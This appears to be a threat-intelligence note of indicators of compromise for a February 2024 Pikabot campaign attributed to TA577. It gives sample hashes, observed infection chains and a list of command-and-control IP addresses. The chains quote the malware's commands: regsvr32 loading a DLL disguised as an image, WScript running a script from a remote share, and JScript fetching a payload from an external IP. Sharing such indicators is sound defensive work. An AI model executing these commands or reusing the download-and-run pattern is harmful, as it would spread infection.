Pikabot_14.02.2024.txt

14.02.2024 | Pikabot | TA577 | 1.8.32-beta 

*************************************************

.zip 184e53af04ff158a22facbe4499694223462bfed7d6c96e83ec1be69272348e4 - pw = HJ
.jar 9e22ec6b12cda4c1de28a8b8b074a05c56ffaaa120b3f2bb841b32492cfb6d0a
.dll 184e53af04ff158a22facbe4499694223462bfed7d6c96e83ec1be69272348e4

.zip 48a03463a38e7e382946f28d6fd335fe9dd04fa361ee2aea2c591d97fd630c18
.xls 19c825e3348a7b74f041f1143d3cc3066635df04d452bdf715593fa3851b38c8
.xls a4b2b440a8786db994d20dc3c92c534df6c137a24207bdeea07de1fabe1f0fa3
.js f67e4bf479953e933376bcce241dd1eb6fe0700718a051466e15a7826cd1360b
.dll 1626880b917b7f5756109dcb6533a5dbae859ccd841554e5bdb6c602cc3a9226

*************************************************

Exec #1

zip > .jar > .dll

java -jar C:\Users\Admin\AppData\Local\Temp\DOLORUMR.jar

icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\\105482.png

regsvr32.exe /s C:\Users\Admin\AppData\Local\Temp\\105482.png

ctfmon.exe -p 1234

*************************************************

#Exec 2.

EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\VOLUPTATEKH.xlsx

WScript.exe \\85.195.115.20\share\1.js

var S5 = new ActiveXObject("msxml2.xmlhttp"), hp = new ActiveXObject("adodb.stream");
S5.open("GET", "http://77.245.76.113/1s6iL/BtCxD", false);

regsvr32 SH.jpg

*************************************************

c2's

45.76.251.190:5631
131.153.231.178:2221
95.179.135.3:2225
155.138.147.62:2223
86.38.225.109:13724
172.232.189.219:2224
198.44.187.12:2224
104.156.233.235:2226
103.82.243.5:13785
86.38.225.106:2221
45.32.248.100:2226
23.226.138.161:5242
37.60.242.85:9785
104.129.55.105:2223
45.32.21.184:5242
178.18.246.136:2078
108.61.78.17:13783
86.38.225.105:13721
172.232.189.10:1194
172.232.162.97:13783


*************************************************